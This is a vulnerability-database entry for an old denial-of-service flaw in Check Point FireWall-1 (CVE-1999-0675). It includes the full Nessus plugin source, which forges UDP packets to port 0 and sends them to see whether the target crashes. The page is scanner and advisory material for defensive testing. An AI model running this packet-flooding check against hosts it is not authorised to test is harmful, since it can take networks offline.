Vulnerabilities > CVE-1999-0675 - Unspecified vulnerability in Checkpoint Firewall-1 3.0/4.0

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
checkpoint
nessus
NVD
Published: 1999-08-09
Updated: 2008-09-09

Summary

Check Point FireWall-1 can be subjected to a denial of service via UDP packets that are sent through VPN-1 to port 0 of a host.

Vulnerable Configurations

Part Description Count
Application
Checkpoint
2

Nessus

NASL familyFirewalls
NASL idFIREWALL1_DOS.NASL
descriptionIt was possible to crash either the remote host or the firewall in between us and the remote host by sending an UDP packet going to port 0. This flaw may allow an attacker to shut down your network.
last seen2020-06-01
modified2020-06-02
plugin id10074
published1999-08-20
reporterThis script is Copyright (C) 1999-2019 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10074
titleCheck Point FireWall-1 UDP Port 0 DoS
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(10074);
 script_version("1.31");
 script_cvs_date("Date: 2019/03/06 18:38:55");

 script_cve_id("CVE-1999-0675");
 script_bugtraq_id(576);

 script_name(english:"Check Point FireWall-1 UDP Port 0 DoS");
 script_summary(english:"Crashes the remote host by sending a UDP packet going to port 0");

 script_set_attribute(attribute:"synopsis", value:"The remote firewall has a denial of service vulnerability.");
 script_set_attribute(attribute:"description", value:
"It was possible to crash either the remote host or the firewall in
between us and the remote host by sending an UDP packet going to port
0.

This flaw may allow an attacker to shut down your network.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Aug/94");
 script_set_attribute(attribute:"solution", value:
"Contact your firewall vendor if it was the firewall which crashed, or
filter incoming UDP traffic if the remote host crashed.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"vuln_publication_date", value:"1999/08/09");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/08/20");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_KILL_HOST);
 script_family(english:"Firewalls");

 script_copyright(english:"This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.");

 script_require_keys("Settings/ParanoidReport");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

if ( TARGET_IS_IPV6 ) exit(0);
start_denial();


ip = forge_ip_packet(ip_v   : 4,
		     ip_hl  : 5,
		     ip_tos : 0,
		     ip_id  : 0x4321,
		     ip_len : 28,
		     ip_off : 0,
		     ip_p   : IPPROTO_UDP,
		     ip_src : compat::this_host(),
		     ip_ttl : 0x40);

# Forge the UDP packet

udp = forge_udp_packet( ip : ip,
			uh_sport : 1234, uh_dport : 0,
			uh_ulen : 8);


#
# Send this packet 10 times
#

send_packet(udp, pcap_active:FALSE) x 10;

#
# wait
#
sleep(5);

#
# And check...
#
alive = end_denial();
if(!alive){
                set_kb_item(name:"Host/dead", value:TRUE);
                security_hole(port:0, proto:"udp");
                }

References